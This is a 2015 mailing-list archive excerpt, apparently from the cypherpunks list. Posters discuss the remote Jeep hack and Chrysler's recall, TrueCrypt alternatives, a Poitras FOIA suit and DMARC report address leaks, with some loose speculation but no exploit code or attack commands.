accidents will go up and >> >> maybe mainstream media will cry "car/hackers injure human" >> >> (the other way is not news, it is statistics). >> > >> > Some conspiracists conjectured this might have happened in the fatal, >> > fiery crash of the investigative journalist Michael Hastings in L.A., >> > but without hard evidence it's the purview of the credulous prone to >> > conspiracy theories rather than an actual one (of which there are >> > many). >> >> Right, I mean the official story was such a credulous one, and no one in >> squeaky clean US power structure had any motive to eliminate an >> investigative journalist like Hastings. >> >> Oh those credulous conspiracy theorists with their crazy theories about >> assassination via car hacking. > > Calling something a conspiracy theory is a common disinfo tactic. We used > to have to play Spot the Fed, now they out themselves... Bah, humbug! Conspiracy theory if ever I heard one! From l at odewijk.nl Fri Jul 24 09:27:09 2015 From: l at odewijk.nl (=?UTF-8?Q?Lodewijk_andr=C3=A9_de_la_porte?=) Date: Sat, 25 Jul 2015 01:27:09 +0900 Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: References: <20150724120211.GA2562@sivokote.iziade.m$> <14ec0294ce8.276e.4d489027c0c4d0c1b1ca03a1f48f1ffb@misanthropia.org> <20150724130438.4E76DC00014@frontend1.nyi.internal> Message-ID: Not physically separating essential vehicle control from the onboard entertainment system, because what could possibly go wrong? I seriously wonder if there's any assassinations that've happened with the use of this mechanism. (1. wait until approaching intersection at high speed, 2. disengage brakes + steering wheel, is probably very effective) Gotta love how these cars constantly report their locations :) -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 605 bytes Desc: not available URL: From jdb10987 at yahoo.com Fri Jul 24 19:30:40 2015 From: jdb10987 at yahoo.com (jim bell) Date: Sat, 25 Jul 2015 02:30:40 +0000 (UTC) Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: References: Message-ID: <272601606.2349960.1437791440090.JavaMail.yahoo@mail.yahoo.com> From: Zenaan Harkness >Plenty of suspicious private (and not so) jet crashes over the years >too. Non-overridable remote-control systems - what could possibly go >wrong? "Welcome to Westworld, where nothing can go wrong...go wrong...go wrong...."       Jim Bell (You'd have to bet 50 years old to see that movie in the theaters.) -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2449 bytes Desc: not available URL: From odinn.cyberguerrilla at riseup.net Sat Jul 25 03:01:57 2015 From: odinn.cyberguerrilla at riseup.net (odinn) Date: Sat, 25 Jul 2015 03:01:57 -0700 Subject: True Crypt is Not Secure In-Reply-To: References: <55B2D4FC.3040805@riseup.net> <81506925-A27A-4924-8B9C-AD7BE5BACEC7@cathalgarvey.me> Message-ID: <55B35E95.5020407@riseup.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Yes, I would also recommend Tomb. https://www.dyne.org/software/tomb/ via dyne.org / unsystem by Jaromil (https://github.com/jaromil). Note: It was mentioned earlier that there is TrueCrypt support in cryptsetup. I recommended using cryptsetup (if you are able to) but I don't recommend TrueCrypt. see https://github.com/bwalex/tc-play On 07/25/2015 12:04 AM, Yush Bhardwaj wrote: > After a little search and reading your replies , VeraCrypt for > windows and Tomb for debian looks good to me. > > > > /* */ /* */ /* */ /* */ /* */ /* */ /*Yush Bhardwaj*/ > > > On Sat, Jul 25, 2015 at 11:45 AM, Cathal (Phone) > > wrote: > > I've used zuluCrypt a few times, which I recall building with > TC-play, works great for vanilla containers at least and has a GUI > at least as good as TrueCrypt itself. > > On 25 July 2015 01:14:52 GMT+01:00, odinn > > wrote: > > I thought that this was already answered long ago... but it keeps > getting brought up from time to time. > > For what I consider to be the definitive answer on why you should > not use TrueCrypt and what alternatives to it are, see: > > http://grugq.tumblr.com/post/60464139008/alternative-truecrypt-impleme nt > > ations > > Note that from TAILS 1.0.1 they incorporated LUKS, and I recommend > cryptsetup, the "Swiss Army Knife of Disk Encryption." In any > event, you'll definitely want to check out this: > https://github.com/bwalex/tc-play > > Should be helpful. > > -O > > > > On 07/24/2015 07:46 AM, Yush Bhardwaj wrote: > > BitLocker is better or I should try something else ? > > WARNING: Using TrueCrypt is not secure > > > http://krebsonsecurity.com/2014/05/true-goodbye-using-truecrypt-is-not > > -secure/ > > > http://truecrypt.sourceforge.net/ /* */ /* */ /* */ /* */ /* */ /* > */ /*Yush Bhardwaj*/ > > > > > -- Sent from my Android device with K-9 Mail. Please excuse my > brevity. > > - -- http://abis.io ~ "a protocol concept to enable decentralization and expansion of a giving economy, and a new social good" https://keybase.io/odinn -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQEcBAEBAgAGBQJVs16VAAoJEGxwq/inSG8CuAAH/ijOmK3FAzoC5xRk2h/4z/hF 5TxwHNzqNTPR+OQN0LtNY9Nt+fDz/Wa1XJng1o9lBQmRJ1YOjYjC2gobPylH8oEw oQP+4JMlN30cNBw759zJ9i76ckGQugNYAppTznkSgC2rzGkiBBCw3bYYFcVO03Ti YGVAdGTi4XMZSjKVKb+oD33M3BaRhjuYZbyb+hcveKSU8P9yW47fdqkIz8K7ABTC R/wxZgt5Lne28rpOpvjKZPOHIvTWUYhpnqTNPiJZJCeSx1D9NBsWp/kR8eAqhi/t Y3Ug7GLpzFu977UFJpZqbSplB8oqEL45ScaODF9pWLGkKP9S0Nnv3E369hGVBKY= =28Nh -----END PGP SIGNATURE----- From coderman at gmail.com Sat Jul 25 03:52:17 2015 From: coderman at gmail.com (coderman) Date: Sat, 25 Jul 2015 03:52:17 -0700 Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: <20150725104404.GB2556@sivokote.iziade.m$> References: <20150724120211.GA2562@sivokote.iziade.m$> <14ec0294ce8.276e.4d489027c0c4d0c1b1ca03a1f48f1ffb@misanthropia.org> <20150724130438.4E76DC00014@frontend1.nyi.internal> <20150724165218.GD2562@sivokote.iziade.m$> <55B2734F.2010904@riseup.net> <55B29597.1090706@riseup.net> <55B29F01.7050105@m-o-o-t.org> <55B2A77D.4020009@riseup.net> <20150725104404.GB2556@sivokote.iziade.m$> Message-ID: On 7/25/15, Georgi Guninski wrote: > ... > Thanks. The link appears to contradict wired's claim of "wireless > exploit", incorrect. it was wireless, and not only that, it was remote incoming over Sprint infrastructure. > possibly because they are covering their corporate asses. so much ass covering right now! > Fiat Chrysler said exploiting the flaw "required unique and extensive > technical knowledge, ahahahah > prolonged physical access to a subject vehicle and lololololol > extended periods of time to write code" and added manipulating its > software "constitutes criminal action". motherfuckers, did you learn nothing? this is how not to respond to severe, critical, architectural defects in critical systems. guess auto industry gonna play it ugly. (too bad, we all lose!) best regards, From coderman at gmail.com Sat Jul 25 03:58:48 2015 From: coderman at gmail.com (coderman) Date: Sat, 25 Jul 2015 03:58:48 -0700 Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: References: <20150724120211.GA2562@sivokote.iziade.m$> <14ec0294ce8.276e.4d489027c0c4d0c1b1ca03a1f48f1ffb@misanthropia.org> <20150724130438.4E76DC00014@frontend1.nyi.internal> <20150724165218.GD2562@sivokote.iziade.m$> <55B2734F.2010904@riseup.net> <55B29597.1090706@riseup.net> <55B29F01.7050105@m-o-o-t.org> <55B2A77D.4020009@riseup.net> <20150725104404.GB2556@sivokote.iziade.m$> Message-ID: On 7/25/15, coderman wrote: >... two points of clarification: 1. there is assumption that information is silo'ed, also cannot be shared. not! 2. the difficulty regarding SprintPCS is that their lease space spans class A's. see https://peertech.org/files/cidr-privacy-space-cell-data-2009.txt for a unique set sample across five devices for a month in a particular configuration at a single tower. for example. this is why the mandatory Sprint block was actually an unconventional but exceptionally effective mitigation for this path to remote control. best regards, From coderman at gmail.com Sat Jul 25 04:49:41 2015 From: coderman at gmail.com (coderman) Date: Sat, 25 Jul 2015 04:49:41 -0700 Subject: Poitras joins Roark in pro se solidarity Message-ID: rules of the road: http://cryptome.org/2015/07/poitras-003.pdf From coderman at gmail.com Sat Jul 25 05:20:00 2015 From: coderman at gmail.com (coderman) Date: Sat, 25 Jul 2015 05:20:00 -0700 Subject: FOIPA adventures In-Reply-To: References: <000701d0bcb7$94118e80$bc34ab80$@co.uk> Message-ID: an interesting response on the FOIA stats: https://www.documentcloud.org/documents/2124204-responsive-documents.html FOIA totals from 2005 through 2014 for FBI RIDS. PA req. contention continues... best regards, From l at odewijk.nl Fri Jul 24 13:26:53 2015 From: l at odewijk.nl (=?UTF-8?Q?Lodewijk_andr=C3=A9_de_la_porte?=) Date: Sat, 25 Jul 2015 05:26:53 +0900 Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: <55B29597.1090706@riseup.net> References: <20150724120211.GA2562@sivokote.iziade.m$> <14ec0294ce8.276e.4d489027c0c4d0c1b1ca03a1f48f1ffb@misanthropia.org> <20150724130438.4E76DC00014@frontend1.nyi.internal> <20150724165218.GD2562@sivokote.iziade.m$> <55B2734F.2010904@riseup.net> <55B29597.1090706@riseup.net> Message-ID: Anyone care for a law that will: 1. Ban unhackable vehicles and other life-critical devices (meaning: life-critical software must be rewritable) 2. Require all life-critical software to be released in source format, for the purpose of public auditing, improving it's safety features and employing the software on the devices it is intended for. 3. Any tools used to translate the source to writable code must also be provided in the manner of 2. These laws should still allow manufacturers to: 1. Spy on their users without that being changed 2. Lock down their code so competitors may not use it (proprietary open source) 3. Have software in the machines that is not opened; so long as it is properly (verifiably) isolated from essential systems 4. Legally own the entire machine 5. Drop guarantees when non-security-related modifications have been made etc This law should be as precise and immutable as possible. This is not a matter of "I want to hack things" or "competition would be better if it were open" or "I want to own what I have/use", etc, etc. Being precise with the law allows it to pass more readily. Personally I think if everything were required open source and self-compiled; that would objectively be better for humanity as a whole. For protecting innovation there's patents, closing the source is excess. Etc. etc. But this is not about fun. This is about extremely basic safety. It is about national security; if 500,000 cars go haywire at the same time a lot of deaths, directly and indirectly, can be expected. And it's not just the cars; it's also the industrial machines, medical equipment, the metro's and trains, the automated cars and busses and trucks and aircraft, medium sized hobbyist drones, heaters, stoves and ovens, automated doors, elevators, fire, smoke and other emergency alarms, etc. Should a foreign country cyberattack whilst doing any other kind of large scale attack; the effects could be devastating. Should a person be marked for assassination, no one would be the wiser. I'd argue for similar protection for fridges, televisions, smartphones, etc, etc, as more and more items are expected to become networked and essential for upholding basic freedoms and ways of life. And I'd argue to have it for privacy; not just essential safety. Simply put; the simple version of the law above is imperative for personal and national security. And it doesn't exist. (note: all countries should be more worried about cybersecurity. I cannot trust my government to act as it should if every public servant can be blackmailed or thoroughly spied upon. It's not hard to improve security; but it's much harder now that nobody's doing it, and now that it's given no priority) -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 3643 bytes Desc: not available URL: From coderman at gmail.com Sat Jul 25 06:03:52 2015 From: coderman at gmail.com (coderman) Date: Sat, 25 Jul 2015 06:03:52 -0700 Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: <20150725123347.GC2556@sivokote.iziade.m$> References: <20150724165218.GD2562@sivokote.iziade.m$> <55B2734F.2010904@riseup.net> <55B29597.1090706@riseup.net> <55B29F01.7050105@m-o-o-t.org> <55B2A77D.4020009@riseup.net> <20150725104404.GB2556@sivokote.iziade.m$> <20150725123347.GC2556@sivokote.iziade.m$> Message-ID: On 7/25/15, Georgi Guninski wrote: > ... > Do you mean for additional ownage one needs network sploits? correct. like cell site simulators which put you in the data path. > Is Sprint's network equipment up to date and safe? > (Having in mind Cisco/BGP and the like we doubt it) they peer differently than most, out of Kansas. it's kinda weird :) also more secure than most, so i suspect the next weak link is GSM... best regards, From l at odewijk.nl Fri Jul 24 14:07:20 2015 From: l at odewijk.nl (=?UTF-8?Q?Lodewijk_andr=C3=A9_de_la_porte?=) Date: Sat, 25 Jul 2015 06:07:20 +0900 Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: <55B2A235.5010609@cathalgarvey.me> References: <20150724120211.GA2562@sivokote.iziade.m$> <14ec0294ce8.276e.4d489027c0c4d0c1b1ca03a1f48f1ffb@misanthropia.org> <20150724130438.4E76DC00014@frontend1.nyi.internal> <20150724165218.GD2562@sivokote.iziade.m$> <55B2734F.2010904@riseup.net> <55B29597.1090706@riseup.net> <55B2A235.5010609@cathalgarvey.me> Message-ID: 2015-07-25 5:38 GMT+09:00 Cathal Garvey : > Without getting into the issue of whether patents encourage innovation.. I > do think that medical devices are a special case. If you have a heart > implant, that thing needs to be "unhackable", but also totally verifiably > safe. So there should be firmware signing, no mutable state, verifiable > memory safety...but the code should be open source, and if need be the > firmware signing key for each device (needs to be different for each > device!) should be accessible by a legitimate owner. > > So, no more remote-hackable heart implants, but doctors and cardiac > technicians can still apply critical patches and inspect the source for > sanity. > Why should a heart implant be different than a car? Because there's experts involved? There's always experts involved! Because it's so life critical? It's always "so life critical"! Legally difficult is the differences between "owner" and "user". I think whomever actually uses the device should be the one to be able to hack it. That includes leases, rents, corporate ownership, and everything else. "I drive it, I decide the software it runs". This follows from the idea that "the software's choices are my choices" - in case of such direct life affectors that choice should never be taken away. It's funny; I think this evolved into an equivalent of the "forced inoculation" argument... There's some point to be made for experts truly knowing better, and nobody having any reason to go against the experts' opinions. I think that, in that case, any rational person should be able to reach that same conclusion. If they don't, well, that's a more general problem to be approached separately. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2307 bytes Desc: not available URL: From coderman at gmail.com Sat Jul 25 06:32:45 2015 From: coderman at gmail.com (coderman) Date: Sat, 25 Jul 2015 06:32:45 -0700 Subject: Poitras joins Roark in pro se solidarity In-Reply-To: References: Message-ID: On 7/25/15, John Young wrote: > USG may use Poitras suit to try Snowden absentia as well as to > suppress withholders of his slow dripping public dump. innocent in absentia imply a return, then? :) suppression already in place; chance to un-logjam FOIA with precedent worth pursuing. best regards, From cathalgarvey at cathalgarvey.me Fri Jul 24 23:15:09 2015 From: cathalgarvey at cathalgarvey.me (Cathal (Phone)) Date: Sat, 25 Jul 2015 07:15:09 +0100 Subject: True Crypt is Not Secure In-Reply-To: <55B2D4FC.3040805@riseup.net> References: <55B2D4FC.3040805@riseup.net> Message-ID: <81506925-A27A-4924-8B9C-AD7BE5BACEC7@cathalgarvey.me> I've used zuluCrypt a few times, which I recall building with TC-play, works great for vanilla containers at least and has a GUI at least as good as TrueCrypt itself. On 25 July 2015 01:14:52 GMT+01:00, odinn wrote: >-----BEGIN PGP SIGNED MESSAGE----- >Hash: SHA1 > >I thought that this was already answered long ago... but it keeps >getting brought up from time to time. > >For what I consider to be the definitive answer on why you should not >use TrueCrypt and what alternatives to it are, see: > >http://grugq.tumblr.com/post/60464139008/alternative-truecrypt-implement >ations > >Note that from TAILS 1.0.1 they incorporated LUKS, and I recommend >cryptsetup, the "Swiss Army Knife of Disk Encryption." In any event, >you'll definitely want to check out this: >https://github.com/bwalex/tc-play > >Should be helpful. > >- -O > > > >On 07/24/2015 07:46 AM, Yush Bhardwaj wrote: >> BitLocker is better or I should try something else ? >> >> WARNING: Using TrueCrypt is not secure >> >> >> >http://krebsonsecurity.com/2014/05/true-goodbye-using-truecrypt-is-not >- -secure/ >> >> http://truecrypt.sourceforge.net/ /* */ /* */ /* */ /* */ /* */ >> /* */ /*Yush Bhardwaj*/ >> > >- -- >http://abis.io ~ >"a protocol concept to enable decentralization >and expansion of a giving economy, and a new social good" >https://keybase.io/odinn >-----BEGIN PGP SIGNATURE----- >Version: GnuPG v1 > >iQEcBAEBAgAGBQJVstT8AAoJEGxwq/inSG8C1OcH/1NWAA7Kmzqz5CcYs40j3Oe8 >v19Wpvn6QzlqFwNxdFvxSV4c8QWUDdCtD+XBoAVby65lsDwm9x+Nd3ka0fEEep0a >ssJHeeHHrNE7V7ijL8gWdZOGH9fa6mNjIEXFuRCywCaMahidBJZnq3UjTJwZ5y/T >avUXmwuM1mOx/Fv9YUMch0QTVs4qMtVacECH6TCvOcXRoCzznvP+L4JESy7Pybd3 >la9TD2c/lAdfJriAsu0iBqInq7hv3ssz/RMif6hoR146edSdT3KxM18siGAEejIN >A0PJGF2nTC+YH15PUEjndvFxq6sG11kBzBp3b7F8jX1/YJZhmA+0J/iNHLhOV8Q= >=MQer >-----END PGP SIGNATURE----- -- Sent from my Android device with K-9 Mail. Please excuse my brevity. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2991 bytes Desc: not available URL: From guninski at guninski.com Fri Jul 24 22:45:05 2015 From: guninski at guninski.com (Georgi Guninski) Date: Sat, 25 Jul 2015 08:45:05 +0300 Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: <1725354647.2377948.1437776420870.JavaMail.yahoo@mail.yahoo.com> References: <55B2A235.5010609@cathalgarvey.me> <1725354647.2377948.1437776420870.JavaMail.yahoo@mail.yahoo.com> Message-ID: <20150725054505.GA2556@sivokote.iziade.m$> On Fri, Jul 24, 2015 at 10:20:20PM +0000, jim bell wrote: > > It should be fairly simple to protect against heart-implant hacks.  First, communication with them is probably limited to inductively-coupled signalling, at a fairly high level.  Secondly, it should be based on a two-way challenge/response system:  The external device signals a code, call it a password, to which the implant would respond with a reply, which itself includes a randomized code.  The external device reads that randomized code, processes it in some way (presumably a hash), and retransmits it to the implant.  Only if the implanted device receives what it considers the correct code, would it allow further manipulation.  Presumably, any attempt to illegitimately access such a device wouldn't be close enough to read the implant's reply signals, and thus couldn't proceed further. > "Do you have have a match?".   "No, but I have a lighter".  "Even better".   "Until they go wrong". > >          Jim Bell IMHO even if you get perfect info security (which is impossible), this will be just a small step. Humans are screwing the climate and the food with dangerous food supplements. In the long term this might extinguish humans in its present form. Heard that in Australia skin cancer is major concern, closely related to the Sun and there a lot of food supplements (locally we call them "E"-s) are forbidden by law. I deny being green, but judge for yourself. > From jya at pipeline.com Sat Jul 25 06:11:50 2015 From: jya at pipeline.com (John Young) Date: Sat, 25 Jul 2015 09:11:50 -0400 Subject: Poitras joins Roark in pro se solidarity In-Reply-To: References: Message-ID: USG may use Poitras suit to try Snowden absentia as well as to suppress withholders of his slow dripping public dump. At 07:49 AM 7/25/2015, you wrote: >rules of the road: > http://cryptome.org/2015/07/poitras-003.pdf -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 401 bytes Desc: not available URL: From list at sysfu.com Sat Jul 25 12:25:56 2015 From: list at sysfu.com (Seth) Date: Sat, 25 Jul 2015 12:25:56 -0700 Subject: DMARC report mailing list subscriber address leaks In-Reply-To: <20150725113747.GD6906@ctrlc.hu> References: <55B2DD10.7090600@riseup.net> <20150725113747.GD6906@ctrlc.hu> Message-ID: On Sat, 25 Jul 2015 04:37:47 -0700, stef wrote: > On Fri, Jul 24, 2015 at 07:39:59PM -0700, Seth wrote: >> OK, as requested, here's the first report from fastmail.fm > > how many are there in total? I get a few each day. Mostly from hotmail, fastmail.fm, yahoo.com and google. Think I saw one form xs4all too but it didn't climb over ye olde greylisting wall. > can you post this in some less fuckd up way than this copypaste crap? > are there some urls, that could be simply curled for example? I heard you screamin', the copypasta was extremely lame, I'm forwarding to Shelley who volunteered to perform proper text processing/formatting after which the extracted contents will be posted to the list. From yushbhardwaj91 at gmail.com Sat Jul 25 00:04:41 2015 From: yushbhardwaj91 at gmail.com (Yush Bhardwaj) Date: Sat, 25 Jul 2015 12:34:41 +0530 Subject: True Crypt is Not Secure In-Reply-To: <81506925-A27A-4924-8B9C-AD7BE5BACEC7@cathalgarvey.me> References: <55B2D4FC.3040805@riseup.net> <81506925-A27A-4924-8B9C-AD7BE5BACEC7@cathalgarvey.me> Message-ID: After a little search and reading your replies , VeraCrypt for windows and Tomb for debian looks good to me. *Yush Bhardwaj* On Sat, Jul 25, 2015 at 11:45 AM, Cathal (Phone) < cathalgarvey at cathalgarvey.me> wrote: > I've used zuluCrypt a few times, which I recall building with TC-play, > works great for vanilla containers at least and has a GUI at least as good > as TrueCrypt itself. > > On 25 July 2015 01:14:52 GMT+01:00, odinn > wrote: >> >> -----BEGIN PGP SIGNED MESSAGE----- >> Hash: SHA1 >> >> I thought that this was already answered long ago... but it keeps >> getting brought up from time to time. >> >> For what I consider to be the definitive answer on why you should not >> use TrueCrypt and what alternatives to it are, see: >> >> http://grugq.tumblr.com/post/60464139008/alternative-truecrypt-implement >> ations >> >> Note that from TAILS 1.0.1 they incorporated LUKS, and I recommend >> cryptsetup, the "Swiss Army Knife of Disk Encryption." In any event, >> you'll definitely want to check out this: >> https://github.com/bwalex/tc-play >> >> Should be helpful. >> >> - -O >> >> >> >> On 07/24/2015 07:46 AM, Yush Bhardwaj wrote: >> >>> BitLocker is better or I should try something else ? >>> >>> WARNING: Using TrueCrypt is not secure >>> >>> >>> http://krebsonsecurity.com/2014/05/true-goodbye-using-truecrypt-is-not >>> >> - -secure/ >> >>> >>> http://truecrypt.sourceforge.net/ /* */ /* */ /* */ /* */ /* */ >>> /* */ /*Yush Bhardwaj*/ >>> >>> >> - -- >> http://abis.io ~ >> "a protocol concept to enable decentralization >> and expansion of a giving economy, and a new social good" >> https://keybase.io/odinn >> -----BEGIN PGP SIGNATURE----- >> Version: GnuPG v1 >> >> iQEcBAEBAgAGBQJVstT8AAoJEGxwq/inSG8C1OcH/1NWAA7Kmzqz5CcYs40j3Oe8 >> v19Wpvn6QzlqFwNxdFvxSV4c8QWUDdCtD+XBoAVby65lsDwm9x+Nd3ka0fEEep0a >> ssJHeeHHrNE7V7ijL8gWdZOGH9fa6mNjIEXFuRCywCaMahidBJZnq3UjTJwZ5y/T >> avUXmwuM1mOx/Fv9YUMch0QTVs4qMtVacECH6TCvOcXRoCzznvP+L4JESy7Pybd3 >> la9TD2c/lAdfJriAsu0iBqInq7hv3ssz/RMif6hoR146edSdT3KxM18siGAEejIN >> A0PJGF2nTC+YH15PUEjndvFxq6sG11kBzBp3b7F8jX1/YJZhmA+0J/iNHLhOV8Q= >> =MQer >> -----END PGP SIGNATURE----- >> >> > -- > Sent from my Android device with K-9 Mail. Please excuse my brevity. > -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 4399 bytes Desc: not available URL: From yushbhardwaj91 at gmail.com Sat Jul 25 00:12:33 2015 From: yushbhardwaj91 at gmail.com (Yush Bhardwaj) Date: Sat, 25 Jul 2015 12:42:33 +0530 Subject: True Crypt is Not Secure In-Reply-To: References: <55B2D4FC.3040805@riseup.net> <81506925-A27A-4924-8B9C-AD7BE5BACEC7@cathalgarvey.me> Message-ID: I am sorry forgot to say Thank You guys *Yush Bhardwaj* On Sat, Jul 25, 2015 at 12:34 PM, Yush Bhardwaj wrote: > After a little search and reading your replies , VeraCrypt for windows and > Tomb for debian looks good to me. > > > > > > > > > > *Yush Bhardwaj* > > > On Sat, Jul 25, 2015 at 11:45 AM, Cathal (Phone) < > cathalgarvey at cathalgarvey.me> wrote: > >> I've used zuluCrypt a few times, which I recall building with TC-play, >> works great for vanilla containers at least and has a GUI at least as good >> as TrueCrypt itself. >> >> On 25 July 2015 01:14:52 GMT+01:00, odinn < >> odinn.cyberguerrilla at riseup.net> wrote: >>> >>> -----BEGIN PGP SIGNED MESSAGE----- >>> Hash: SHA1 >>> >>> I thought that this was already answered long ago... but it keeps >>> getting brought up from time to time. >>> >>> For what I consider to be the definitive answer on why you should not >>> use TrueCrypt and what alternatives to it are, see: >>> >>> http://grugq.tumblr.com/post/60464139008/alternative-truecrypt-implement >>> ations >>> >>> Note that from TAILS 1.0.1 they incorporated LUKS, and I recommend >>> cryptsetup, the "Swiss Army Knife of Disk Encryption." In any event, >>> you'll definitely want to check out this: >>> https://github.com/bwalex/tc-play >>> >>> Should be helpful. >>> >>> - -O >>> >>> >>> >>> On 07/24/2015 07:46 AM, Yush Bhardwaj wrote: >>> >>>> BitLocker is better or I should try something else ? >>>> >>>> WARNING: Using TrueCrypt is not secure >>>> >>>> >>>> http://krebsonsecurity.com/2014/05/true-goodbye-using-truecrypt-is-not >>>> >>> - -secure/ >>> >>>> >>>> http://truecrypt.sourceforge.net/ /* */ /* */ /* */ /* */ /* */ >>>> /* */ /*Yush Bhardwaj*/ >>>> >>>> >>> - -- >>> http://abis.io ~ >>> "a protocol concept to enable decentralization >>> and expansion of a giving economy, and a new social good" >>> https://keybase.io/odinn >>> -----BEGIN PGP SIGNATURE----- >>> Version: GnuPG v1 >>> >>> iQEcBAEBAgAGBQJVstT8AAoJEGxwq/inSG8C1OcH/1NWAA7Kmzqz5CcYs40j3Oe8 >>> v19Wpvn6QzlqFwNxdFvxSV4c8QWUDdCtD+XBoAVby65lsDwm9x+Nd3ka0fEEep0a >>> ssJHeeHHrNE7V7ijL8gWdZOGH9fa6mNjIEXFuRCywCaMahidBJZnq3UjTJwZ5y/T >>> avUXmwuM1mOx/Fv9YUMch0QTVs4qMtVacECH6TCvOcXRoCzznvP+L4JESy7Pybd3 >>> la9TD2c/lAdfJriAsu0iBqInq7hv3ssz/RMif6hoR146edSdT3KxM18siGAEejIN >>> A0PJGF2nTC+YH15PUEjndvFxq6sG11kBzBp3b7F8jX1/YJZhmA+0J/iNHLhOV8Q= >>> =MQer >>> -----END PGP SIGNATURE----- >>> >>> >> -- >> Sent from my Android device with K-9 Mail. Please excuse my brevity. >> > > -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 5614 bytes Desc: not available URL: From Rayzer at riseup.net Sat Jul 25 13:05:01 2015 From: Rayzer at riseup.net (Razer) Date: Sat, 25 Jul 2015 13:05:01 -0700 Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: <55B2F380.9060806@pilobilus.net> References: <20150724120211.GA2562@sivokote.iziade.m$> <14ec0294ce8.276e.4d489027c0c4d0c1b1ca03a1f48f1ffb@misanthropia.org> <20150724130438.4E76DC00014@frontend1.nyi.internal> <20150724165218.GD2562@sivokote.iziade.m$> <55B2734F.2010904@riseup.net> <55B2CE54.8020301@riseup.net> <55B2F380.9060806@pilobilus.net> Message-ID: <55B3EBED.5060702@riseup.net> On 07/24/2015 07:25 PM, Steve Kinney wrote: > > Need some volunteers and/or a funding angel to create a corpus of > howto docs that identify the RF receiver parts in automotive ECM > units and their associated wiring harnesses, including which pins > to cut to assure radio silence in both directions. RF sniffers are common electronic equipment. Keychain wireless networks detectors and all that. Just pay attention to where your hands wander attempting to pinpoint the rf source's location, HEI ignition systems, fan belts , whirling parts etc, maim and kill. I'm reading this discussion with some amusement because I wrote off car ownership and being a 'motorhead' a decade or more ago when the cars wouldn't let you tune them up correctly b/c 'computer'. RR -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 819 bytes Desc: OpenPGP digital signature URL: From s at ctrlc.hu Sat Jul 25 04:17:53 2015 From: s at ctrlc.hu (stef) Date: Sat, 25 Jul 2015 13:17:53 +0200 Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: References: <20150724130438.4E76DC00014@frontend1.nyi.internal> <20150724165218.GD2562@sivokote.iziade.m$> <55B2734F.2010904@riseup.net> <55B29597.1090706@riseup.net> <55B29F01.7050105@m-o-o-t.org> <55B2A77D.4020009@riseup.net> <20150725104404.GB2556@sivokote.iziade.m$> Message-ID: <20150725111753.GB6906@ctrlc.hu> On Sat, Jul 25, 2015 at 03:52:17AM -0700, coderman wrote: > > extended periods of time to write code" and added manipulating its > > software "constitutes criminal action". > > motherfuckers, did you learn nothing? no, like every industry first hit by our train. > this is how not to respond to severe, critical, architectural defects > in critical systems. > > guess auto industry gonna play it ugly. there was already this news item: "Fiat Chrysler Recalls 1.4 million Cars After Software Bug is Revealed" this is not very sustainable i guess. my bet for their next step is fixing this OTA. m( -- otr fp: https://www.ctrlc.hu/~stef/otr.txt From s at ctrlc.hu Sat Jul 25 04:37:47 2015 From: s at ctrlc.hu (stef) Date: Sat, 25 Jul 2015 13:37:47 +0200 Subject: DMARC report mailing list subscriber address leaks In-Reply-To: References: <55B2DD10.7090600@riseup.net> Message-ID: <20150725113747.GD6906@ctrlc.hu> On Fri, Jul 24, 2015 at 07:39:59PM -0700, Seth wrote: > OK, as requested, here's the first report from fastmail.fm how many are there in total? can you post this in some less fuckd up way than this copypaste crap? are there some urls, that could be simply curled for example? thx,s -- otr fp: https://www.ctrlc.hu/~stef/otr.txt From guninski at guninski.com Sat Jul 25 03:44:04 2015 From: guninski at guninski.com (Georgi Guninski) Date: Sat, 25 Jul 2015 13:44:04 +0300 Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: <55B2A77D.4020009@riseup.net> References: <20150724120211.GA2562@sivokote.iziade.m$> <14ec0294ce8.276e.4d489027c0c4d0c1b1ca03a1f48f1ffb@misanthropia.org> <20150724130438.4E76DC00014@frontend1.nyi.internal> <20150724165218.GD2562@sivokote.iziade.m$> <55B2734F.2010904@riseup.net> <55B29597.1090706@riseup.net> <55B29F01.7050105@m-o-o-t.org> <55B2A77D.4020009@riseup.net> Message-ID: <20150725104404.GB2556@sivokote.iziade.m$> On Fri, Jul 24, 2015 at 02:00:45PM -0700, Razer wrote: > > From offlist: > > On 07/24/2015 01:24 PM, Peter Fairbrother wrote: > > Fiat Chrysler recalls 1.4 million cars after Jeep hack > > > > http://www.bbc.co.uk/news/technology-33650491 > Thanks. The link appears to contradict wired's claim of "wireless exploit", possibly because they are covering their corporate asses. Fiat Chrysler said exploiting the flaw "required unique and extensive technical knowledge, prolonged physical access to a subject vehicle and extended periods of time to write code" and added manipulating its software "constitutes criminal action". "prolonged physical access to a subject vehicle" isn't remote. Is the jeep sploit remote or not? "time to write code" doesn't make sense to me once you have written it. From coderman at gmail.com Sat Jul 25 13:46:33 2015 From: coderman at gmail.com (coderman) Date: Sat, 25 Jul 2015 13:46:33 -0700 Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: <55B2CE54.8020301@riseup.net> References: <20150724120211.GA2562@sivokote.iziade.m$> <14ec0294ce8.276e.4d489027c0c4d0c1b1ca03a1f48f1ffb@misanthropia.org> <20150724130438.4E76DC00014@frontend1.nyi.internal> <20150724165218.GD2562@sivokote.iziade.m$> 